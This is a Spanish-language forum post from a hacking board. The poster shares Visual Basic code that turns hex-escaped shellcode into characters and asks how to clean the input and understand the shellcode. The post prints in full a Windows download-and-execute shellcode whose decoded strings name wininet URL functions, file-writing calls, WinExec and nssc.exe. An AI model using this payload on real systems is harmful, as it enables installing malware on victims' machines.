elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.


 


Tema destacado: Introduccin a la Factorizacin De Semiprimos (RSA)


  Mostrar Temas
Páginas: [1]
1  Programacin / Programacin Visual Basic / codigo vb para traducir shellcode en hexadecimal a ascii en: 23 Octubre 2005, 15:19 pm
Bueno gracias por leer ... aqui viene mi codigo

Private Sub Command1_Click()
On Error Resume Next


    Dim sOriginal As String
    Dim sBuscar As String
    Dim sPoner As String
    Dim sbuf As String
    Dim fbuf As String
    Dim salto As Integer
    Dim contador As Integer
   

    sOriginal = Text2.Text
    sBuscar = "x"
    sPoner = "&H"
    salto = 1



    sbuf = Replace(sOriginal, sBuscar, sPoner, , , vbTextCompare)
   
    sBuscar = "\"
   
    sPoner = ""
   
    Text1.Text = Replace(sbuf, sBuscar, sPoner, , , vbTextCompare)
   
     sBuscar = """"
   
    sPoner = ""
   
    Text1.Text = Replace(Text1.Text, sBuscar, sPoner, , , vbTextCompare)
   
 
   
   
   
    Do Until contador = Len(Text1.Text) / 4
    fbuf = fbuf & Chr(Mid(Text1.Text, salto, 4))
    salto = salto + 4
    contador = contador + 1
    Loop
   
    Text3.Text = fbuf
   
End Sub

'text2.text sera igual en el formulario a
'\xEB\x30\x5F\xFC\x8B\xF7\x80""\x3F\x08\x75\x03\x80\x37\x08\x47\x80\x3F\x01\x75\xF2\x8B\xE6\x33\xD2\xB2\x04\xC1""\xE2\x08\x2B\xE2\x8B\xEC\x33\xD2\xB2\x03\xC1\xE2\x08\x2B\xE2\x54\x5A\xB2\x7C\x8B""\xE2\xEB\x02\xEB\x57\x89\x75\xFC\x33\xC0\xB4\x40\xC1\xE0\x08\x89\x45\xF8\x8B\x40""\x3C\x03\x45\xF8\x8D\x40\x7E\x8B\x40\x02\x03\x45\xF8\x8B\xF8\x8B\x7F\x0C\x03\x7D""\xF8\x81\x3F\x4B\x45\x52\x4E\x74\x07\x83\xC0\x14\x8B\xF8\xEB\xEB\x50\x8B\xF8\x33""\xC9\x33\xC0\xB1\x10\x8B\x17\x03\x55\xF8\x52\xEB\x03\x57\x8B\xD7\x80\x7A\x03\x80""\x74\x16\x8B\x32\x03\x75\xF8\x83\xC6\x02\xEB\x02\xEB\x7E\x8B\x7D\xFC\x51\xF3\xA6""\x59\x5F\x74\x06\x40\x83\xC7\x04\xEB\xDB\x5F\x8B\x7F\x10\x03\x7D\xF8\xC1\xE0\x02""\x03\xF8\x8B\x07\x8B\x5D\xFC\x8D\x5B\x11\x53\xFF\xD0\x89\x45\xF4\x8B\x40\x3C\x03""\x45\xF4\x8B\x70\x78\x03\x75\xF4\x8D\x76\x1C\xAD\x03\x45\xF4\x89\x45\xF0\xAD\x03""\x45\xF4\x89\x45\xEC\xAD\x03\x45\xF4\x89\x45\xE8\x8B\x55\xEC\x8B\x75\xFC\x8D\x76""\x1E\x33\xDB\x33\xC9\xB1\x0F\x8B\x3A\x03\x7D\xF4\x56\x51\xF3\xA6\x59\x5E\x74\x06""\x43\x8D
'x52\x04\xEB\xED\xD1\xE3\x8B\x75\xE8\x03\xF3\x33\xC9\x66\x8B\x0E\xEB\x02""\xEB\x7D\xC1\xE1\x02\x03\x4D\xF0\x8B\x09\x03\x4D\xF4\x89\x4D\xE4\x8B\x5D\xFC\x8D""\x5B\x2D\x33\xC9\xB1\x07\x8D\x7D\xE0\x53\x51\x53\x8B\x55\xF4\x52\x8B\x45\xE4\xFC""\xFF\xD0\x59\x5B\xFD\xAB\x8D\x64\x24\xF8\x38\x2B\x74\x03\x43\xEB\xF9\x43\xE2\xE1""\x8B\x45\xE0\x53\xFC\xFF\xD0\xFD\xAB\x33\xC9\xB1\x04\x8D\x5B\x0C\xFC\x53\x51\x53""\x8B\x55\xC4\x52\x8B\x45\xE4\xFF\xD0\x59\x5B\xFD\xAB\x38\x2B\x74\x03\x43\xEB\xF9""\x43\xE2\xE5\xFC\x33\xD2\xB6\x1F\xC1\xE2\x08\x52\x33\xD2\x52\x8B\x45\xD4\xFF\xD0""\x89\x45\xB0\x33\xD2\xEB\x02\xEB\x77\x52\x52\x52\x52\x53\x8B\x45\xC0\xFF\xD0\x8D""\x5B\x03\x89\x45\xAC\x33\xD2\x52\xB6\x80\xC1\xE2\x10\x52\x33\xD2\x52\x52\x8D\x7B""\x09\x57\x50\x8B\x45\xBC\xFF\xD0\x89\x45\xA8\x8D\x55\xA0\x52\x33\xD2\xB6\x1F\xC1""\xE2\x08\x52\x8B\x4D\xB0\x51\x50\x8B\x45\xB8\xFF\xD0\x8B\x4D\xA8\x51\x8B\x45\xB4""\xFF\xD0\x8B\x4D\xAC\x51\x8B\x45\xB4\xFF\xD0\x33\xD2\x52\x53\x8B\x45\xDC\xFF\xD0""\x89\x45\xA4\x8B\x7D\xA0\x57\x8B\x55\xB0\x52\x5
'\x8B\x45\xD8\xFF\xD0\x8B\x55\xA4""\x52\x8B\x45\xD0\xFF\xD0\xEB\x02\xEB\x12\x33\xD2\x90\x52\x53\x8B\x45\xCC\xFF\xD0""\x33\xD2\x52\x8B\x45\xC8\xFF\xD0\xE8\xE6\xFD\xFF\xFF\x47\x65\x74\x4D\x6F\x64\x75""\x6C\x65\x48\x61\x6E\x64\x6C\x65\x41\x08\x6B\x65\x72\x6E\x65\x6C\x33\x32\x2E\x64""\x6C\x6C\x08\x47\x65\x74\x50\x72\x6F\x63\x41\x64\x64\x72\x65\x73\x73\x08\x4C\x6F""\x61\x64\x4C\x69\x62\x72\x61\x72\x79\x41\x08\x5F\x6C\x63\x72\x65\x61\x74\x08\x5F""\x6C\x77\x72\x69\x74\x65\x08\x47\x6C\x6F\x62\x61\x6C\x41\x6C\x6C\x6F\x63\x08\x5F""\x6C\x63\x6C\x6F\x73\x65\x08\x57\x69\x6E\x45\x78\x65\x63\x08\x45\x78\x69\x74\x50""\x72\x6F\x63\x65\x73\x73\x08\x77\x69\x6E\x69\x6E\x65\x74\x2E\x64\x6C\x6C\x08\x49""\x6E\x74\x65\x72\x6E\x65\x74\x4F\x70\x65\x6E\x41\x08\x49\x6E\x74\x65\x72\x6E\x65""\x74\x4F\x70\x65\x6E\x55\x72\x6C\x41\x08\x49\x6E\x74\x65\x72\x6E\x65\x74\x52\x65""\x61\x64\x46\x69\x6C\x65\x08\x49\x6E\x74\x65\x72\x6E\x65\x74\x43\x6C\x6F\x73\x65""\x48\x61\x6E\x64\x6C\x65\x08\x4E\x53\x08\x6E\x73\x73\x63\x2E\x65\x78\x65\x08"
'lo escribo directamente en el formulario por q no encontre la manera de igualar text2.text con estos parametros sin limpiar primero a mano las "
'solo es un ejemplo de shellcode descargado del web al igual q no consegui q mi programa limpie los (enter) y tengo q quitarlas en un editor de textos a mano antes de copiarlas al text2.text


Mis preguntas son varias ....

- Como puedo hacer para limpiar con mi programa las " y los enter &HD en decimal 13 y en general cualquier caracter ascii q no puedo tipear directamente del teclado o q entra en conflicto en el codigo por usarse dentro del codigo para otros menesteres ...

- Entender basicamente q cojones esta escrito en esta shell code .... mi resultado de traduccion despues de limpiar a mano los enter (aunq las comillas si me las limpia si escribo directamente en el formulario) fue este ...

0_?u7G?u3Ҳ+3Ҳ+TZ|Wu3@E@<E@~@E }?KERNtP33URW׀zt2u~}QY_t@_}][SЉE@<EpxuvEEEEEEUuv33ɱ:}VQY^tCRu3f}M   MM][-3ɱ}SQSUREY[d$8+tCCES3ɱ[ SQSUREY[8+tCC3ҶR3REЉE3wRRRRSEЍ[E3RR3RR{   WPEЉEU R3ҶRMQPEЋMQEЋMQE3RSEЉE} WURPEЋURE3ҐRSE3REGetModuleHandleAkernel32.dllGetProcAddressLoadLibraryA_lcreat_lwriteGlobalAlloc_lcloseWinExecExitProcesswininet.dllInternetOpenAInternetOpenUrlAInternetReadFileInternetCloseHandleNSnssc.exe

Bueno el final parece estar algo claro al menos ay por donde empezar pero todosa esos demas caracteres q ay desde le principioooo , bueno si quiero programarme una debo entenderlo y esq no consigo encontra ay instrucciones de ensamblador ni nada .......
gracias todos por su tiempo
Páginas: [1]
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines